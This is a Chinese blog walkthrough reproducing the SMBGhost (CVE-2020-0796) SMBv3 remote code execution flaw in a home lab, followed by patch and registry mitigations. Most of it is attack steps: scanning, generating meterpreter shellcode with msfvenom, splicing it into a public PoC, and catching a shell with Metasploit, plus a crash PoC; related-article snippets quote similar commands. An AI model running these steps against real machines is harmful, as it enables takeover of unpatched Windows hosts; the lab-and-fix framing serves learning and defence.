CVE-2020-0796 RCE漏洞复现

最新推荐文章于 2024-03-13 09:41:56 发布
最新推荐文章于 2024-03-13 09:41:56 发布
阅读量557 收藏 2
点赞数
分类专栏: CVE 系统漏洞复现 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/WFC1006848997/article/details/112548474
版权

CVE-2020-0796 RCE漏洞复现

0x01 漏洞简介

2020年3月10日,微软在其官方SRC发布了CVE-2020-0796的安全公告(ADV200005,MicrosoftGuidance for Disabling SMBv3 Compression),公告表示在Windows SMBv3版本的客户端和服务端存在远程代码执行漏洞。同时指出该漏洞存在于MicroSoft Server Message Block 3.1.1协议处理特定请求包的功能中,攻击者利用该漏洞可在目标SMB Server或者Client中执行任意代码。
该漏洞的后果十分接近永恒之蓝系列,都利用Windows SMB漏洞远程攻击获取系统最高权限,WannaCry勒索蠕虫就是利用永恒之蓝系列漏洞攻击工具制造的大灾难。除了直接攻击SMB服务端造成RCE外,该漏洞得亮点在于对SMB客户端的攻击,攻击者可以构造特定的网页,压缩包,共享目录,OFFICE文档等多种方式触发漏洞进行攻击。

0x02 影响版本

  • Windows 10 Version 1903 for 32-bit Systems
  • Windows 10 Version 1903 for x64-based Systems
  • Windows 10 Version 1903 for ARM64-based Systems
  • Windows Server, Version 1903 (Server Core installation)
  • Windows 10 Version 1909 for 32-bit Systems
  • Windows 10 Version 1909 for x64-based Systems
  • Windows 10 Version 1909 for ARM64-based Systems
  • Windows Server, Version 1909 (Server Core installation)

我使用的测试版本: Windows 10 (consumer editions) version 1903 (x64)

迅雷下载

ed2k://|file|cn_windows_10_consumer_editions_version_1903_x64_dvd_8f05241d.iso|4905476096|F28FDC23DA34D55BA466BFD6E91DD311|/

0x03 环境准备

攻击机 kali: ip - 192.168.30.154

靶机 windows 10: ip - 192.168.163 关闭防火墙,还未更新系统

检测靶机是否存在漏洞的工具

https://github.com/ollypwn/SMBGhost

攻击工具

https://github.com/chompie1337/SMBGhost_RCE_PoC.git

0x04 漏洞复现

使用检测工具检测漏洞是否存在

root@kali911:~/桌面/SMBGhost-master# python3 scanner.py 192.168.30.163

在这里插入图片描述

存在漏洞,利用msf生成python的反弹shellcode

root@kali911:~# msfvenom -p windows/x64/meterpreter/bind_tcp lport=5656 -f py -o exp.py

在这里插入图片描述

查看生成的 py

root@kali911:~# cat exp.py

在这里插入图片描述

打开攻击工具的py文件

root@kali911:~/桌面/SMBGhost_RCE_PoC-master# gedit exploit.py

需要更改的文件在 91行 到 127

在这里插入图片描述

将 exploit.py 91行 - 127 行 替换成刚刚我们生成的反弹shellcopy exp.py文件

exp.py 文件内容

在这里插入图片描述

exp.py 文件红框的内容 复制 替换 exploit.py 文件91行-127行同样的内容

exploit.py 原文件内容

在这里插入图片描述

替换后

在这里插入图片描述

启动msfconsole

root@kali911:~# msfconsole

使用监听模块multi/handler

msf5 > use exploit/multi/handler

设置靶机 IP

msf5 exploit(multi/handler) > set rhost 192.168.30.163

设置监听端口

msf5 exploit(multi/handler) > set lport 5656

设置返回载荷

msf5 exploit(multi/handler) > set payload windows/x64/meterpreter/bind_tcp

开始攻击

msf5 exploit(multi/handler) > run

在这里插入图片描述

使用我们刚刚编辑好的 exploit.py 攻击脚本

root@kali911:~/桌面/SMBGhost_RCE_PoC-master# python3 exploit.py -ip 192.168.30.163

在这里插入图片描述

msf即可成功反弹 shell

在这里插入图片描述

查看靶机系统信息

meterpreter > sysinfo

进入 shell

在这里插入图片描述

剩下的各种操作就不在叙述

还有一个可以直接攻击蓝屏的POC

https://github.com/jiansiting/CVE-2020-0796

攻击方式

root@kali911:~/桌面/CVE-2020-0796-master# python3 cve-2020-0796.py 192.168.30.163

在这里插入图片描述

0x05 漏洞修复

1、更新安装补丁,补丁链接:

https://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB4551762

https://portal.msrc.microsoft.com/zh-cn/security-guidance/advisory/CVE-2020-0796

2、使用管理员命令( PowerShell )禁用SMBv3服务的压缩

Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" DisableCompression -Type DWORD -Value 1 -Force

没禁用,检测存在漏洞

在这里插入图片描述

禁用后,检测不存在漏洞

在这里插入图片描述

3、禁用 SMB 445端口

Spaceman-911
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【网络安全---漏洞复现】Tomcat CVE-2024-1938 漏洞复现和利用过程(特详细)
2401_83946826的博客
04-16 1363
python2 ‘Tomcat-ROOT路径下文件读取(CVE-2020-1938).py’ -p 8009 -f /WEB-INF/web.xml 192.168.31.160。
Redis 未授权访问 CNNVD-201511-230 漏洞复现
Senimo
05-03 1854
CNNVD-201511-230 Redis 未授权访问漏洞一、漏洞描述二、漏洞影响三、漏洞复现1、环境搭建2、漏洞复现四、漏洞POC五、参考链接六、利用工具 一、漏洞描述 Redis 是美国 RedisLabs 公司赞助的一套开源的使用 ANSIC 编写、支持网络、可基于内存亦可持久化的日志型、键值(Key-Value)存储数据库,并提供多种语言的 API。Redis 中存在未授权访问漏洞,该漏洞源于程序在默认配置下会绑定在 6379 端口,这导致其直接暴露在公网中,可以接受来自任何地址发来的请求。当程序
CVE-2020-0796
m_de_g的博客
10-08 6583
CVE-2020-0796(永恒之黑) 一.对应出现的版本 永恒之黑的对象为采用Windows 10 1903之后的所有终端节点,如Windows家用版、专业版、企业版、教育版,Windows 10 1903 (19H1)、Windows 10 1909、 Windows Server 19H1均为潜在攻击目标,Windows 7不受影响。 原理为由于SMB 3.1.1协议中处理压缩消息时,对其中数据没有经过安全检查,直接使用会引发内存破坏漏洞,可能被攻击者利用远程执行任意代码。 首先下载 CVE-2020
【网络安全---漏洞复现】shiro550反序列化漏洞原理与漏洞复现和利用(基于vulhub,保姆级的详细教程)
m0_67844671的博客
09-21 4224
shiro550反序列化漏洞原理与漏洞复现和利用(基于vulhub,保姆级的详细教程);Apache Shiro是一个强大且易用的Java安全框架,执行身份验证、授权、密码和会话管理。使用Shiro的易于理解的API,您可以快速、轻松地获得任何应用程序,从最小的移动应用程序到最大的网络和企业应用程序;
msf教学CVE-2020-0796攻击及修复
arissa666的博客
07-06 452
声明:本内容非真实商用网站,均为个人手工自行搭建的虚拟网站,仅为个人练习,无任何商业获利或者侵权行为。cd进入到刚才保存的目录,用python3 CVE-2020-0796.py 主机地址,进行poc攻击。用下载好的文件检测目标主机是否有漏洞: python3 扫描文件 目标主机。把刚才复制的一堆文件整理下格式,替换到exploit.py里面,保存。命令行打开这目录,exploit.py就是刚才替换内容的文件。另外开一个kali连接,用mf启动监听器。回到刚才的会话,用exploit进行攻击。
log4j漏洞复现
weixin_68647219的博客
04-20 4576
2021年12月8号爆出的log4j2的远程代码执行漏洞cve-2021-44228】,堪称史诗级核弹漏洞,虽然过了这么久,大部分现网中的相关漏洞已经修复,但任然可以捡漏…,网上也有不少大佬和研究机构都对该漏洞做了分析和复盘,年前年后比较忙,一直没有好好的分析总结该漏洞,最近学习下刚好补上。
CVE-2020-35728:CVE-2020-35728 和 Jackson-databind RCE
05-31
如何RCE pom.xml <?xml version="1.0" encoding="UTF-8"?> <project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http:
[Timeline Sec] - CVE-2020-9484:Tomcat Session 反序列化复现1
08-03
0x05 漏洞复现 目标是让服务器执行命令 `touch /tmp/2333`。假设一个恶意的`.session`文件已经被上传到服务器。攻击者首先需要利用LFI漏洞读取这个文件,然后通过构造特定的数据包,使服务器在反序列化过程中执行...
CVE-2020-16947:CVE-2020-16947的PoC(Microsoft Outlook RCE漏洞
03-08
CVE-2020-16947 此漏洞发生在Windows 10 1909 x64上安装的Outlook 2019(16.0.13231.20262)中TLDR; 我使用winafl模糊测试程序发现了此错误。 解析html内容时发生此错误。 如果攻击者成功执行此攻击,则可能导致...
CVE-2019-18935:RCE漏洞用于ASP.NET AJAX的Telerik UI中的.NET JSON反序列化漏洞
05-25
CVE-2019-18935 Telerik UI中用于ASP.NET AJAX的.NET JSON反序列化漏洞的概念验证漏洞,允许远程执行代码。 描述 是用于Web应用程序的UI组件的广泛使用的套件。 它以不安全的方式反序列化JSON对象,从而导致在软件...
cve-2020-0796_漏洞分析视角下的CVE20200796漏洞
weixin_40008870的博客
11-23 607
1概述2020年3月10日是微软补丁日,安全社区注意到Microsoft发布并立即删除了有关CVE-2020-0796的信息;2020年3月11日早上,Microsoft发布了可纠正SMBv3协议如何处理特制请求的修补程序;2020年03月12日微软发布安全公告声称Microsoft 服务器消息块 3.1.1 (SMBv3) 协议处理某些请求的方式中存在远程执行代码漏洞。成功利用此漏洞...
WebSphere漏洞总结复现
1ance's blog
11-14 9222
写在前面:本文为漏洞复现系列WebSphere篇,复现漏洞已vulhub中存在的环境为主。 欢迎大家点赞收藏,点点关注更好了hhhhhh 文章目录简介WebSphere反序列化(CVE-2015-7450)漏洞原理影响范围漏洞复现修复建议弱口令 && 后台Getshell漏洞原理影响范围漏洞复现修复建议CVE-2020-4450总结 简介 WebSphere® Application Server 加速交付新应用程序和服务,它可以通过快速交付创新的应用程序来帮助企业提供丰富的用户体验从基
Wordpress漏洞复现
weixin_52194536的博客
09-10 8819
cms漏洞
CVE-2020-0796漏洞复现
最新发布
m0_65764670的博客
03-13 594
漏洞为基于win10 1903基于底层smb的3.1.1版本漏洞("SMB"代表"Server Message Block",是一种用于在计算机之间共享文件、打印机和其他资源的通信协议),此漏洞靶机需开445端口,如未开445端口则无法进行实验。
渗透测试之路:ThinkPHP漏洞复现
m0_68353775的博客
01-10 2311
其实ThinkPH框架漏洞大多用到的都是设置对于控制器名的一个疏忽问题,不理解的小伙伴可以查来url调用文件的机制来学习一下,其实这些框架漏洞都是基于基础漏洞的一些拓展,至于sql漏洞,了解一下pdo预编译原理即可。不管java或是php在进行数据库查询的时候都应该进行pdo预编译,我们都知道,在jdbc工作的时候分成好多步1.建立连接2.写入sql语句3.预编译sql语句4.设置参数5.执行sql获取结果6.遍历结果(处理结果)7.关闭连接。
CVE-2020-0796复现(基于kali实现)
m0_74988425的博客
03-06 1228
本次漏洞源于SMBv3没有正确处理压缩的数据包,在解压数据包的时候使用客户端传过来的长度进行解压时,并没有检查长度是否合法,最终导致整数溢出。然而,在这里使用的是`bind_tcp`,它不需要指定远程主机,因此在这种情况下,这个命令没有实际效果。CVE-2020-0796是指影响微软Windows 10和Windows Server 2019的一个漏洞,通常被称为"SMBGhost"或"CoronaBlue"。2. 网络分段: 将网络分为不同的区域,将不同的系统放置在不同的网络中。
CVE-2020-0796 SMBv3漏洞复现过程
BROTHERYY的博客
10-07 207
1.扫描主机是否存在漏 扫描py文件链接 2.下载可利用的POC poc地址 3.在kali里使用msfvenom生成shell,lhost是攻击机ip msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.236.130 lport=4444 -f py -o exp.py 4.将生成的shell替换poc文件夹里的exploit.py的USER_PAYLOAD,整个全部替换 5.进入msf开启监听 use exploit/mu
微软紧急发布SMBv3协议漏洞-CVE-2020-0796验证、攻击演示、修复和扫描源代码
qq_34801745的博客
03-14 1678
微软紧急发布SMBv3协议漏洞-CVE-2020-0796验证与修复 ** 描述:Microsoft服务器消息块3.1.1(SMBv3)协议处理某些请求的方式中存在一个远程执行代码漏洞。成功利用此漏洞的攻击者可以获得在目标服务器或客户端上执行代码的能力。 为了利用针对服务器的漏洞,未经身份验证的攻击者可以将特制数据包发送到目标SMBv3服务器。若要利用针对客户端的漏洞,未经身份验证的攻击者将需要配...
CVE-2020-14882​&14883:Weblogic RCE复现1
08-03
近期,两个关键性漏洞 CVE-2020-14882 和 CVE-2020-14883 被发现,这些漏洞的存在使得未经授权的远程攻击者能够通过精心构造的GET请求,在受影响的Weblogic Server上执行任意代码。这两个漏洞影响了多个版本,包括...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值